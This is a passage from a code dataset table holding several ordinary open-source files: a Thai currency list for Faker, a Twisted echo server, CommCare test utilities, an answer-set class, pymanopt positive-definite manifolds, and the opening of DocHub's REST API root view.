repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---|
joke2k/faker | faker/providers/currency/th_TH/__init__.py | 1 | 10596 | from .. import Provider as CurrencyProvider
# Names taken from https://std.moc.go.th/std/codelist_detail/40
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "ดีแรห์ม สหรัฐอาหรับเอมิเรตส์"),
("AFN", "อัฟกานิ"),
("ALL", "เลค"),
("AMD", "ดีแรห์ม อาร์เมเนีย"),
("ANG", "กิลเดอร์ เนเธอร์แลนด์แอนทิลลิส"),
("AOA", "ควันซา"),
("ARS", "เปโซ อาร์เจนตินา"),
("AUD", "ดอลลาร์ ออสเตรเลีย"),
("AWG", "กิลเดอร์ อารูบา"),
("AZN", "มานาท อาเซอร์ไบจาน"),
("BAM", "มาร์ค บอสเนียและเฮอร์เซโกวีนา"),
("BBD", "ดอลลาร์ บาร์เบโดส"),
("BDT", "ตากา"),
("BGN", "เลฟ บัลแกเรีย"),
("BHD", "ดีนาร์ บาห์เรน"),
("BIF", "ฟรังก์ บุรุนดี"),
("BMD", "ดอลลาร์ เบอร์มิวดา"),
("BND", "ดอลลาร์ บรูไนดารุสซาลาม"),
("BOB", "โบลีเวียโน"),
("BRL", "เรียล บราซิล"),
("BSD", "ดอลลาร์ บาฮามาส"),
("BTN", "เองกัลทรัม"),
("BWP", "พูลา"),
("BYR", "รูเบิล เบลารุส"),
("BZD", "ดอลลาร์ เบลีซ"),
("CAD", "ดอลลาร์ แคนาดา"),
("CDF", "ฟรังก์ คองโก"),
("CHF", "ฟรังก์ สวิส"),
("CLF", "ฟันด์ โค้ด ยูนิแดด ดี โฟเมนโต"),
("CLP", "เปโซ ชิลี"),
("CNY", "หยวนเหรินหมินปี้"),
("COP", "เปโซ โคลอมเบีย"),
("COU", "ยูนิแดด ดี วาโล เรียล"),
("CRC", "โคโลน คอสตาริกา"),
("CUC", "แปลงสภาพเปโซ"),
("CUP", "เปโซ คิวบา"),
("CVE", "เอสคูโด เคปเวิร์ด"),
("CZK", "คราวน์ เช็ก"),
("DJF", "ฟรังก์ จิบูตี"),
("DKK", "โครน เดนมาร์ก"),
("DOP", "เปโซ สาธารณรัฐโดมินิกัน"),
("DZD", "ดีนาร์ แอลจีเรีย"),
("EGP", "ปอนด์ อียิปต์"),
("ERN", "นาคฟา"),
("ETB", "เปอร์ เอธิโอเปีย"),
("EUR", "ยูโร"),
("FJD", "ดอลลาร์ ฟิจิ"),
("FKP", "ปอนด์ หมู่เกาะฟอล์กแลนด์"),
("GBP", "ปอนด์สเตอลิง"),
("GEL", "ลารี"),
("GHS", "เซดี กานา"),
("GIP", "ปอนด์ ยิบรอลตาร์"),
("GMD", "ดาราซี"),
("GNF", "ฟรังก์ กินี"),
("GTQ", "เก็ตซาล"),
("GYD", "ดอลลาร์ กายอานา"),
("HKD", "ดอลลาร์ ฮ่องกง"),
("HNL", "เลมพีรา ฮอนดูรัส"),
("HRK", "คูนา"),
("HTG", "กอร์ด"),
("HUF", "ฟอรินท์"),
("IDR", "รูเปีย"),
("ILS", "เชคเกิล อิสราเอล"),
("INR", "รูปี อินเดีย"),
("IQD", "ดีนาร์ อิรัก"),
("IRR", "เรียล อิหร่าน"),
("ISK", "โครนา ไอซ์แลนด์"),
("JMD", "ดอลลาร์ จาเมกา"),
("JOD", "ดอลลาร์ จอร์แดน"),
("JPY", "เยน"),
("KES", "ชิลลิง เคนยา"),
("KGS", "ซอม"),
("KHR", "เรียล กัมพูชา"),
("KMF", "ฟรังก์ คอโมโรส"),
("KPW", "วอน เกาหลีเหนือ"),
("KRW", "วอน เกาหลีใต้"),
("KWD", "ดีนาร์ คูเวต"),
("KYD", "ดอลลาร์ หมู่เกาะเคย์แมน"),
("KZT", "เทงเก"),
("LAK", "กีบ"),
("LBP", "ปอนด์ เลบานอน"),
("LKR", "รูปี ศรีลังกา"),
("LRD", "ดอลลาร์ ไลบีเรีย"),
("LSL", "โลตี"),
("LTL", "ลีทาส ลิทัวเนีย"),
("LVL", "ลัตส์ ลัตเวีย"),
("LYD", "ดีนาร์ ลิเบีย"),
("MAD", "ดีแรห์ม โมร็อกโก"),
("MDL", "ลิว มอลโดวา"),
("MGA", "อเรียรี่ มาดากัสการ์"),
("MKD", "ดีนาร์ มาซิโดเนีย"),
("MMK", "จัต"),
("MNT", "ทูกริค"),
("MOP", "พาทากา"),
("MRO", "อูกุยยา / อูกียา"),
("MUR", "รูปี มอริเชียส"),
("MVR", "รูฟียา"),
("MWK", "ควาซา มาลาวี"),
("MXN", "เปโซ เม็กซิโก"),
("MYR", "ริงกิต มาเลเซีย"),
("MZN", "เมททิคัล โมซัมบิก"),
("NAD", "ดอลลาร์ นามิเบีย"),
("NGN", "ไนรา"),
("NIO", "คอร์โดบา"),
("NOK", "โครน นอร์เวย์"),
("NPR", "รูปี เนปาล"),
("NZD", "ดอลลาร์ นิวซีแลนด์"),
("OMR", "เรียล โอมาน"),
("PAB", "บัลโบอา"),
("PEN", "ซัล เปรู"),
("PGK", "คีนา"),
("PHP", "เปโซ ฟิลิปปินส์"),
("PKR", "รูปี ปากีสถาน"),
("PLN", "สล็อตตี"),
("PYG", "กวารานี"),
("QAR", "เรียล กาตาร์"),
("RON", "ลิว โรมาเนีย"),
("RSD", "ดีนาร์ เซอร์เบีย"),
("RUB", "รูเบิล รัสเซีย"),
("RWF", "ฟรังก์ รวันดา"),
("SAR", "ริยัล ซาอุดีอาระเบีย"),
("SBD", "ดอลลาร์ หมู่เกาะโซโลมอน"),
("SCR", "รูปี เซเชลส์"),
("SDG", "ปอนด์ ซูดาน"),
("SEK", "โครนา สวีเดน"),
("SGD", "ดอลลาร์ สิงคโปร์"),
("SHP", "ปอนด์ เซนต์เฮเลนา"),
("SLL", "ลีโอน"),
("SOS", "ชิลลิง โซมาเลีย"),
("SRD", "ดอลลาร์ ซูรินาเม"),
("SSP", "ปอนด์ เซาท์ซูดาน"),
("STD", "โดบรา"),
("SVC", "โคโลน เอลซัลวาดอร์"),
("SYP", "ปอนด์ ซีเรีย"),
("SZL", "ลิลอนเกนี"),
("THB", "บาท"),
("TJS", "โซโมนิ"),
("TMT", "มานาท เติร์กเมนิสถานใหม่"),
("TND", "ดีนาร์ ตูนิเซีย"),
("TOP", "พาอานกา"),
("TRY", "ลีร์ ตุรกี"),
("TTD", "ดอลลาร์ ตรินิแดดและโตเบโก"),
("TWD", "ดอลลาร์ ไต้หวัน"),
("TZS", "ชิลลิง แทนซาเนีย"),
("UAH", "รีฟเนีย"),
("UGX", "ชิลลิง ยูกันดา"),
("USD", "ดอลลาร์ สหรัฐอเมริกา"),
("USN", "ดอลลาร์ สหรัฐอเมริกา เน็กซ์เดย์ฟัน"),
("UYI", "อุรุกวัย เปโซ เอ็น อุนดิดาเดซ อินเด็กซาดาซ"),
("UYU", "เปโซ อุรุกวัย"),
("UZS", "โซม อุซเบกิสถาน"),
("VEF", "โบลิวาร์"),
("VND", "ดอง"),
("VUV", "วาตู"),
("WST", "ทาลา"),
("XAF", "ฟรังก์ ซีเอฟเอ บีอีเอซี"),
("XAG", "เงิน"),
("XAU", "ทองคำ"),
("XBA", "อียูอาร์ซีโอ"),
("XBB", "อีเอ็มยู 6"),
("XBC", "บัญชี อียู 9"),
("XBD", "บัญชี อียู 17"),
("XCD", "ดอลลาร์ คาริบเบียลตะวันออก"),
("XDR", "สิทธิพิเศษถอนเงิน (กองทุนการเงินระหว่างประเทศ)"),
("XEU", "อี ซี ยู"),
("XFU", "ยูไอซี ฟรังก์"),
("XOF", "ฟรังก์ ซีเอฟเอ บีซีอีเอโอ"),
("XPD", "พัลเลเดียม"),
("XPF", "ฟรังก์ ซีเอฟพี"),
("XPT", "แพลตตินัม"),
("XSU", "ซูเคร"),
("XUA", "เอดีบี"),
("XXX", "ธุรกรรมที่ไม่มีเงินสกุลใดเกี่ยวข้อง"),
("YER", "เรียล เยเมน"),
("ZAR", "แรนด์"),
("ZMW", "ควาซา แซมเบีย"),
("ZWL", "ดอลลาร์ ซิมบับเว"),
)
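# Usage sketch (hypothetical, assuming the standard Faker provider API rather than
# anything defined in this file): with the th_TH locale loaded, this provider backs
# the generic currency fakers.
#
#   from faker import Faker
#   fake = Faker("th_TH")
#   fake.currency()        # e.g. ("THB", "บาท") - a (code, name) pair from the tuple above
#   fake.currency_code()   # e.g. "THB"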
| mit | 2,836,218,077,930,482,700 | 32.537634 | 66 | 0.38538 | false |
obedmr/MPIaaS | app/echoserv.py | 1 | 1498 | #!/usr/bin/env python
from twisted.internet.protocol import Protocol, Factory
from twisted.internet import reactor
import twisted.internet.error
import sys
import ConfigParser
CONFIG_CONF = "setup.conf"
PORT=8000
class Echo(Protocol):
def dataReceived(self, data):
"""
As soon as any data is received, write it back.
"""
lines = data.split('\n')
for line in lines:
if "PORT:" in line:
print line
port = line.split(":")[1].strip()
if "SERVER_IP:" in line:
print line
server_ip = line.split(":")[1].strip()
if "LOCAL_IP:" in line:
print line
client_ip = line.split(":")[1].strip()
parser = ConfigParser.SafeConfigParser()
section = 'CLIENTS_' + client_ip
parser.add_section(section)
parser.set(section, 'ip',str(client_ip))
parser.set(section, 'port',str(port))
parser.write(sys.stdout)
file_conf = open(CONFIG_CONF,'a')
parser.write(file_conf)
file_conf.close()
self.transport.write(data)
def main():
try:
f = Factory()
f.protocol = Echo
reactor.listenTCP(PORT, f)
reactor.run()
except twisted.internet.error.CannotListenError, ex:
print "Port is %d busy: %s" % (PORT, ex)
print "Run ./mpiaas_runner.py --killserver"
sys.exit(1)
if __name__ == '__main__':
main()
| apache-2.0 | -7,503,330,617,456,163,000 | 25.280702 | 56 | 0.55474 | false |
qedsoftware/commcare-hq | custom/ilsgateway/tests/handlers/utils.py | 1 | 8375 | from corehq.apps.accounting.models import BillingAccount, DefaultProductPlan, SoftwarePlanEdition, Subscription
from corehq.apps.accounting.tests import generator
from corehq.apps.commtrack.models import CommtrackActionConfig
from corehq.apps.custom_data_fields import CustomDataFieldsDefinition
from corehq.apps.custom_data_fields.models import CustomDataField
from corehq.apps.domain.models import Domain
from corehq.apps.locations.models import Location, SQLLocation, LocationType
from corehq.apps.products.models import Product, SQLProduct
from corehq.apps.sms.tests.util import setup_default_sms_test_backend, delete_domain_phone_numbers
from corehq.apps.users.models import CommCareUser
from custom.ilsgateway.models import ILSGatewayConfig
from custom.ilsgateway.utils import make_loc
from custom.logistics.tests.test_script import TestScript
from custom.logistics.tests.utils import bootstrap_user
from casexml.apps.stock.models import DocDomainMapping
TEST_DOMAIN = 'ils-test-domain'
def create_products(cls, domain_name, codes):
for code in codes:
product = Product(domain=domain_name, name=code, code=code, unit='each')
product.save()
setattr(cls, code, product)
class ILSTestScript(TestScript):
@classmethod
def bypass_setUpClass(cls):
super(ILSTestScript, cls).setUpClass()
@classmethod
def setUpClass(cls):
super(ILSTestScript, cls).setUpClass()
cls.sms_backend, cls.sms_backend_mapping = setup_default_sms_test_backend()
domain = prepare_domain(TEST_DOMAIN)
mohsw = make_loc(code="moh1", name="Test MOHSW 1", type="MOHSW", domain=domain.name)
msdzone = make_loc(code="msd1", name="MSD Zone 1", type="MSDZONE",
domain=domain.name, parent=mohsw)
region = make_loc(code="reg1", name="Test Region 1", type="REGION",
domain=domain.name, parent=msdzone)
cls.district = make_loc(code="dis1", name="Test District 1", type="DISTRICT",
domain=domain.name, parent=region)
cls.district2 = make_loc(code="d10101", name="Test District 2", type="DISTRICT",
domain=domain.name, parent=region)
cls.district3 = make_loc(code="d10102", name="TESTDISTRICT", type="DISTRICT",
domain=domain.name, parent=region)
cls.facility = make_loc(code="loc1", name="Test Facility 1", type="FACILITY",
domain=domain.name, parent=cls.district, metadata={'group': 'A'})
cls.facility_sp_id = cls.facility.sql_location.supply_point_id
facility2 = make_loc(code="loc2", name="Test Facility 2", type="FACILITY",
domain=domain.name, parent=cls.district, metadata={'group': 'B'})
cls.facility3 = make_loc(
code="d31049", name="Test Facility 3", type="FACILITY", domain=domain.name, parent=cls.district,
metadata={'group': 'C'}
)
cls.user1 = bootstrap_user(
cls.facility, username='stella', domain=domain.name, home_loc='loc1', phone_number='5551234',
first_name='stella', last_name='Test', language='sw'
)
bootstrap_user(facility2, username='bella', domain=domain.name, home_loc='loc2', phone_number='5555678',
first_name='bella', last_name='Test', language='sw')
bootstrap_user(cls.district, username='trella', domain=domain.name, home_loc='dis1', phone_number='555',
first_name='trella', last_name='Test', language='sw')
bootstrap_user(cls.district, username='msd_person', domain=domain.name, phone_number='111',
first_name='MSD', last_name='Person', user_data={'role': 'MSD'}, language='sw')
for x in xrange(1, 4):
bootstrap_user(
cls.facility3,
username='person{}'.format(x), domain=domain.name, phone_number=str(32346 + x),
first_name='Person {}'.format(x), last_name='Person {}'. format(x), home_loc='d31049',
language='sw'
)
bootstrap_user(
cls.district2,
username='dperson{}'.format(x), domain=domain.name, phone_number=str(32349 + x),
first_name='dPerson {}'.format(x), last_name='dPerson {}'. format(x), home_loc='d10101',
language='sw'
)
create_products(cls, domain.name, ["id", "dp", "fs", "md", "ff", "dx", "bp", "pc", "qi", "jd", "mc", "ip"])
def setUp(self):
super(ILSTestScript, self).setUp()
self.domain = Domain.get_by_name(TEST_DOMAIN)
self.loc1 = Location.by_site_code(TEST_DOMAIN, 'loc1')
self.loc2 = Location.by_site_code(TEST_DOMAIN, 'loc2')
self.dis = Location.by_site_code(TEST_DOMAIN, 'dis1')
self.user_fac1 = CommCareUser.get_by_username('stella')
self.user_fac2 = CommCareUser.get_by_username('bella')
self.user_dis = CommCareUser.get_by_username('trella')
self.msd_user = CommCareUser.get_by_username('msd_person')
@classmethod
def tearDownClass(cls):
delete_domain_phone_numbers(TEST_DOMAIN)
if cls.sms_backend_mapping.id is not None:
cls.sms_backend_mapping.delete()
if cls.sms_backend.id is not None:
cls.sms_backend.delete()
for username in [
'stella',
'bella',
'trella',
'msd_person',
]:
user = CommCareUser.get_by_username(username)
if user:
user.delete()
for product in Product.by_domain(TEST_DOMAIN):
product.delete()
SQLProduct.objects.all().delete()
ils_gateway_config = ILSGatewayConfig.for_domain(TEST_DOMAIN)
if ils_gateway_config:
ils_gateway_config.delete()
DocDomainMapping.objects.all().delete()
for site_code in [
'loc1',
'loc2',
'dis1',
'reg1',
'moh1',
]:
location = Location.by_site_code(TEST_DOMAIN, site_code)
if location:
location.delete()
SQLLocation.objects.all().delete()
generator.delete_all_subscriptions()
test_domain = Domain.get_by_name(TEST_DOMAIN)
if test_domain:
test_domain.delete()
super(ILSTestScript, cls).tearDownClass()
def prepare_domain(domain_name):
from corehq.apps.commtrack.tests.util import bootstrap_domain
domain = bootstrap_domain(domain_name)
previous = None
for name, administrative in [
("MOHSW", True),
("MSDZONE", True),
("REGION", True),
("DISTRICT", True),
("FACILITY", False)
]:
previous, _ = LocationType.objects.get_or_create(
domain=domain_name,
name=name,
parent_type=previous,
administrative=administrative,
)
generator.instantiate_accounting()
account = BillingAccount.get_or_create_account_by_domain(
domain.name,
created_by="automated-test",
)[0]
plan = DefaultProductPlan.get_default_plan_version(
edition=SoftwarePlanEdition.ADVANCED
)
commtrack = domain.commtrack_settings
commtrack.actions.append(
CommtrackActionConfig(action='receipts',
keyword='delivered',
caption='Delivered')
)
commtrack.save()
subscription = Subscription.new_domain_subscription(
account,
domain.name,
plan
)
subscription.is_active = True
subscription.save()
ils_config = ILSGatewayConfig(enabled=True, domain=domain.name, all_stock_data=True)
ils_config.save()
fields_definition = CustomDataFieldsDefinition.get_or_create(domain.name, 'LocationFields')
fields_definition.fields.append(CustomDataField(
slug='group',
label='Group',
is_required=False,
choices=['A', 'B', 'C'],
is_multiple_choice=False
))
fields_definition.save()
return domain
def add_products(sql_location, products_codes_list):
sql_location.products = [
SQLProduct.objects.get(domain=sql_location.domain, code=code)
for code in products_codes_list
]
sql_location.save()
| bsd-3-clause | 273,365,825,518,556,500 | 41.085427 | 115 | 0.615522 | false |
SimoneLucia/EmbASP-Python | languages/asp/answer_set.py | 1 | 1221 | from languages.asp.asp_mapper import ASPMapper
class AnswerSet(object):
"""A collection of data representing a generic Answer Set"""
def __init__(self, value, weightMap=dict()):
self.__value = value # Where data of answer set is stored
self.__weight_map = weightMap # Where weights of the answer set are stored
self.__atoms = set() # Where Answer set's atoms are stored
def get_answer_set(self):
"""Return the current __value data
The method return a list of answer sets in a String format
"""
return self.__value
def get_atoms(self):
"""Return atoms stored in __atoms
The method returns a set of objects filled with atom data
"""
if not self.__atoms:
mapper = ASPMapper.get_instance()
for atom in self.__value:
obj = mapper.get_object(atom)
if obj is not None:
self.__atoms.add(obj)
return self.__atoms
def get_weights(self):
"""Return the weight_map"""
return self.__weight_map
def __str__(self):
"""Overload string method"""
return str(self.__value)
| mit | -8,103,394,283,243,837,000 | 31.131579 | 83 | 0.564292 | false |
nkoep/pymanopt | pymanopt/manifolds/psd.py | 1 | 15204 | import warnings
import numpy as np
from numpy import linalg as la, random as rnd
from scipy.linalg import expm
# Workaround for SciPy bug: https://github.com/scipy/scipy/pull/8082
try:
from scipy.linalg import solve_continuous_lyapunov as lyap
except ImportError:
from scipy.linalg import solve_lyapunov as lyap
from pymanopt.manifolds.manifold import EuclideanEmbeddedSubmanifold, Manifold
from pymanopt.tools.multi import multilog, multiprod, multisym, multitransp
class _RetrAsExpMixin:
"""Mixin class which defers calls to the exponential map to the retraction
and issues a warning.
"""
def exp(self, Y, U):
warnings.warn(
"Exponential map for manifold '{:s}' not implemented yet. Using "
"retraction instead.".format(self._get_class_name()),
RuntimeWarning)
return self.retr(Y, U)
class SymmetricPositiveDefinite(EuclideanEmbeddedSubmanifold):
"""Manifold of (n x n)^k symmetric positive definite matrices, based on the
geometry discussed in Chapter 6 of Positive Definite Matrices (Bhatia
2007). Some of the implementation is based on sympositivedefinitefactory.m
from the Manopt MATLAB package. Also see "Conic geometric optimisation on
the manifold of positive definite matrices" (Sra & Hosseini 2013) for more
details.
"""
def __init__(self, n, k=1):
self._n = n
self._k = k
if k == 1:
name = ("Manifold of positive definite ({} x {}) matrices").format(
n, n)
else:
name = "Product manifold of {} ({} x {}) matrices".format(k, n, n)
dimension = int(k * n * (n + 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return np.sqrt(self.dim)
def dist(self, x, y):
# Adapted from equation 6.13 of "Positive definite matrices". The
# Cholesky decomposition gives the same result as matrix sqrt. There
# may be more efficient ways to compute this.
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return la.norm(logm)
def inner(self, x, u, v):
return np.tensordot(la.solve(x, u), la.solve(x, v), axes=x.ndim)
def proj(self, X, G):
return multisym(G)
def egrad2rgrad(self, x, u):
# TODO: Check that this is correct
return multiprod(multiprod(x, multisym(u)), x)
def ehess2rhess(self, x, egrad, ehess, u):
# TODO: Check that this is correct
return (multiprod(multiprod(x, multisym(ehess)), x) +
multisym(multiprod(multiprod(u, multisym(egrad)), x)))
def norm(self, x, u):
# This implementation is as fast as np.linalg.solve_triangular and is
# more stable, as the above solver tends to output non positive
# definite results.
c = la.cholesky(x)
c_inv = la.inv(c)
return la.norm(multiprod(multiprod(c_inv, u), multitransp(c_inv)))
def rand(self):
# The way this is done is arbitrary. I think the space of p.d.
# matrices would have infinite measure w.r.t. the Riemannian metric
# (cf. integral 0-inf [ln(x)] dx = inf) so impossible to have a
# 'uniform' distribution.
# Generate eigenvalues between 1 and 2
d = np.ones((self._k, self._n, 1)) + rnd.rand(self._k, self._n, 1)
# Generate an orthogonal matrix. Annoyingly qr decomp isn't
# vectorized so need to use a for loop. Could be done using
# svd but this is slower for bigger matrices.
u = np.zeros((self._k, self._n, self._n))
for i in range(self._k):
u[i], r = la.qr(rnd.randn(self._n, self._n))
if self._k == 1:
return multiprod(u, d * multitransp(u))[0]
return multiprod(u, d * multitransp(u))
def randvec(self, x):
k = self._k
n = self._n
if k == 1:
u = multisym(rnd.randn(n, n))
else:
u = multisym(rnd.randn(k, n, n))
return u / self.norm(x, u)
def transp(self, x1, x2, d):
return d
def exp(self, x, u):
# TODO: Check which method is faster depending on n, k.
x_inv_u = la.solve(x, u)
if self._k > 1:
e = np.zeros(np.shape(x))
for i in range(self._k):
e[i] = expm(x_inv_u[i])
else:
e = expm(x_inv_u)
return multiprod(x, e)
# This alternative implementation is sometimes faster though less
# stable. It can return a matrix with small negative determinant.
# c = la.cholesky(x)
# c_inv = la.inv(c)
# e = multiexp(multiprod(multiprod(c_inv, u), multitransp(c_inv)),
# sym=True)
# return multiprod(multiprod(c, e), multitransp(c))
retr = exp
def log(self, x, y):
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return multiprod(multiprod(c, logm), multitransp(c))
def zerovec(self, x):
k = self._k
n = self._n
if k == 1:
return np.zeros((n, n))
return np.zeros((k, n, n))
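# Minimal usage sketch (values are illustrative): in the affine-invariant geometry
# implemented above, the distance equals the norm of the Riemannian logarithm,
# i.e. dist(x, y) == norm(x, log(x, y)).
#
#   manifold = SymmetricPositiveDefinite(3)
#   x, y = manifold.rand(), manifold.rand()
#   u = manifold.log(x, y)
#   assert abs(manifold.dist(x, y) - manifold.norm(x, u)) < 1e-6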
# TODO(nkoep): This could either stay in here (seeing how it's a manifold of
# psd matrices, or in fixed_rank. Alternatively, move this one and
# the next class to a dedicated 'psd_fixed_rank' module.
class _PSDFixedRank(Manifold, _RetrAsExpMixin):
def __init__(self, n, k, name, dimension):
self._n = n
self._k = k
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 + self._k
def inner(self, Y, U, V):
# Euclidean metric on the total space.
return float(np.tensordot(U, V))
def norm(self, Y, U):
return la.norm(U, "fro")
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def proj(self, Y, H):
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(H) - H.T.dot(Y)
Omega = lyap(YtY, AS)
return H - Y.dot(Omega)
def egrad2rgrad(self, Y, egrad):
return egrad
def ehess2rhess(self, Y, egrad, ehess, U):
return self.proj(Y, ehess)
def retr(self, Y, U):
return Y + U
def rand(self):
return rnd.randn(self._n, self._k)
def randvec(self, Y):
H = self.rand()
P = self.proj(Y, H)
return self._normalize(P)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize(self, Y):
return Y / self.norm(None, Y)
def zerovec(self, X):
return np.zeros((self._n, self._k))
class PSDFixedRank(_PSDFixedRank):
"""
Manifold of n-by-n symmetric positive semidefinite matrices of rank k.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may
be big). Tangent vectors are represented as matrices of the same size as
Y, call them Ydot, so that Xdot = Y Ydot' + Ydot Y. The metric is the
canonical Euclidean metric on Y.
Since for any orthogonal Q of size k, it holds that (YQ)(YQ)' = YY',
we "group" all matrices of the form YQ in an equivalence class. The set
of equivalence classes is a Riemannian quotient manifold, implemented
here.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
An alternative, complete, geometry for positive semidefinite matrices of
rank k is described in Bonnabel and Sepulchre 2009, "Riemannian Metric
and Geometric Mean for Positive Semidefinite Matrices of Fixed Rank",
SIAM Journal on Matrix Analysis and Applications.
The geometry implemented here is the simplest case of the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of "
"rank {:d}".format(n, n, k))
dimension = int(k * n - k * (k - 1) / 2)
super().__init__(n, k, name, dimension)
class PSDFixedRankComplex(_PSDFixedRank):
"""
Manifold of n x n complex Hermitian pos. semidefinite matrices of rank k.
Manifold of n-by-n complex Hermitian positive semidefinite matrices of
fixed rank k. This follows the quotient geometry described
in Sarod Yatawatta's 2013 paper:
"Radio interferometric calibration using a Riemannian manifold", ICASSP.
Paper link: http://dx.doi.org/10.1109/ICASSP.2013.6638382.
A point X on the manifold M is parameterized as YY^*, where Y is a
complex matrix of size nxk of full rank. For any point Y on the manifold M,
given any kxk complex unitary matrix U, we say Y*U is equivalent to Y,
i.e., YY^* does not change. Therefore, M is the set of equivalence
classes and is a Riemannian quotient manifold C^{nk}/U(k)
where C^{nk} is the set of all complex matrix of size nxk of full rank.
The metric is the usual real-trace inner product, that is,
it is the usual metric for the complex plane identified with R^2.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of Hermitian {:d}x{:d} complex "
"matrices of rank {:d}".format(n, n, k))
dimension = 2 * k * n - k * k
super().__init__(n, k, name, dimension)
def inner(self, Y, U, V):
return 2 * float(np.tensordot(U, V).real)
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
def dist(self, U, V):
S, _, D = la.svd(V.T.conj().dot(U))
E = U - V.dot(S).dot(D)
return self.inner(None, E, E) / 2
def rand(self):
rand_ = super().rand
return rand_() + 1j * rand_()
class Elliptope(Manifold, _RetrAsExpMixin):
"""
Manifold of n-by-n psd matrices of rank k with unit diagonal elements.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may be
big). Tangent vectors are represented as matrices of the same size as Y,
call them Ydot, so that Xdot = Y Ydot' + Ydot Y and diag(Xdot) == 0. The
metric is the canonical Euclidean metric on Y.
The diagonal constraints on X (X(i, i) == 1 for all i) translate to
unit-norm constraints on the rows of Y: norm(Y(i, :)) == 1 for all i. The
set of such Y's forms the oblique manifold. But because for any orthogonal
Q of size k, it holds that (YQ)(YQ)' = YY', we "group" all matrices of the
form YQ in an equivalence class. The set of equivalence classes is a
Riemannian quotient manifold, implemented here.
Note that this geometry formally breaks down at rank-deficient Y's. This
does not appear to be a major issue in practice when optimization
algorithms converge to rank-deficient Y's, but convergence theorems no
longer hold. As an alternative, you may use the oblique manifold (it has
larger dimension, but does not break down at rank drop.)
The geometry is taken from the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
self._n = n
self._k = k
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of rank {:d} "
"with diagonal elements being 1".format(n, n, k))
dimension = int(n * (k - 1) - k * (k - 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 * self._k
def inner(self, Y, U, V):
return float(np.tensordot(U, V))
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
# Projection onto the tangent space, i.e., on the tangent space of
# ||Y[i, :]||_2 = 1
def proj(self, Y, H):
eta = self._project_rows(Y, H)
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(eta) - H.T.dot(Y)
Omega = lyap(YtY, -AS)
return eta - Y.dot((Omega - Omega.T) / 2)
def retr(self, Y, U):
return self._normalize_rows(Y + U)
# Euclidean gradient to Riemannian gradient conversion. We only need the
# ambient space projection: the remainder of the projection function is not
# necessary because the Euclidean gradient must already be orthogonal to
# the vertical space.
def egrad2rgrad(self, Y, egrad):
return self._project_rows(Y, egrad)
def ehess2rhess(self, Y, egrad, ehess, U):
scaling_grad = (egrad * Y).sum(axis=1)
hess = ehess - U * scaling_grad[:, np.newaxis]
scaling_hess = (U * egrad + Y * ehess).sum(axis=1)
hess -= Y * scaling_hess[:, np.newaxis]
return self.proj(Y, hess)
def rand(self):
return self._normalize_rows(rnd.randn(self._n, self._k))
def randvec(self, Y):
H = self.proj(Y, self.rand())
return H / self.norm(Y, H)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize_rows(self, Y):
"""Return an l2-row-normalized copy of the matrix Y."""
return Y / la.norm(Y, axis=1)[:, np.newaxis]
# Orthogonal projection of each row of H to the tangent space at the
# corresponding row of X, seen as a point on a sphere.
def _project_rows(self, Y, H):
# Compute the inner product between each vector H[i, :] with its root
# point Y[i, :], i.e., Y[i, :].T * H[i, :]. Returns a row vector.
inners = (Y * H).sum(axis=1)
return H - Y * inners[:, np.newaxis]
def zerovec(self, X):
return np.zeros((self._n, self._k))
| bsd-3-clause | 3,308,188,274,906,176,000 | 36.173594 | 79 | 0.615496 | false |
UrLab/DocHub | www/rest_urls.py | 1 | 1862 | from rest_framework.routers import APIRootView, DefaultRouter
import catalog.rest
import documents.rest
import notifications.rest
import search.rest
import telepathy.rest
import users.rest
import www.rest
class DochubAPI(APIRootView):
"""
This is the API of DocHub.
You are free to use it to crawl DocHub,
write your own frontend or even make a copy of our documents.
But please, if you do, respect these rules:
* Do not hit the server too hard. If you degrade the service for other users, we will ban you.
* Respect the privacy of the users.
* If you scrape and reuse our content, please credit DocHub and the original uploader.
This whole API is auth protected.
To be able to use it without your session cookie,
use your personal token from <a href="/api/me">/api/me</a>
([doc](http://www.django-rest-framework.org/api-guide/authentication/#tokenauthentication))
